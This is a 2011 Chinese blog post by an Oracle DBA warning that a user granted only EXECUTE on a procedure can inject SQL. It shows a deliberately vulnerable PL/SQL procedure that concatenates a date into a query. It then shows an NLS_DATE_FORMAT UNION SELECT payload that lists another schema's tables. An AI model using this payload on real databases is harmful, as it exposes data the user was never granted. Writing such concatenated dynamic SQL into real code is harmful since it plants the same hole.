oracle sql注入

原创 Anbob 2011-08-30

712

今天看tom的有提到一个很有趣的东东，只授权的procedure execute，别人就可以sql注入，以后你可得小心了，下面请看我的试验


[oracle@aix ~]$ sqlplus anbob/anbob
SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011
Copyright (c) 1982, 2007, Oracle.  All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE    10.2.0.4.0      Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production
SQL> select * from all_users;
USERNAME                          USER_ID CREATED
------------------------------ ---------- -------------------
ZYY                                  1099 2011-08-30 11:41:03
GZPX_DB                              1070 2011-08-30 11:41:01
GIAF                                 1069 2011-08-30 11:41:01
DEAN_TRAIN                           1068 2011-08-30 11:41:01
...
75 rows selected.
SQL> select * from tab;
TNAME                          TABTYPE  CLUSTERID
------------------------------ ------- ----------
TEST                           TABLE
TESTA                          TABLE
TESTB                          TABLE
TESTBLOB                       TABLE
TESTC                          TABLE
TESTIMG                        TABLE
TESTKDR                        TABLE
TESTXY                         TABLE
8 rows selected.
SQL> create or replace procedure badboy( p_date in date )
  2  as
  3  l_rec   all_users%rowtype;
  4  c       sys_refcursor;
  5  l_query long;
  6  begin
  7  l_query := 'select * from all_users where created = ''' ||p_date ||'''';
  8  dbms_output.put_line( l_query );
  9  open c for l_query;
 10  for i in 1 .. 10
 11  loop
 12  fetch c into l_rec;
 13  exit when c%notfound;
 14  dbms_output.put_line( l_rec.username || '.....' );
 15  end loop;
 16  close c;
 17  end;
 18  /
Procedure created.
SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'
PL/SQL procedure successfully completed.
SQL> grant execute on badboy to icme;
Grant succeeded.
SQL> conn icme/icme
Connected.
SQL> set serveroutput on
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'
PL/SQL procedure successfully completed.
SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';
Session altered.
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....
PL/SQL procedure successfully completed.
呵，是不是很眼熟，这当然是anbob的表，这些表并没有授权给icme。同样也可以从all_column得到列，那样就可以得到表只的一部份数据了...
复制

oracle

「喜欢这篇文章，您的关注和赞赏是给作者最好的鼓励」

关注作者

oracle sql注入

评论

相关阅读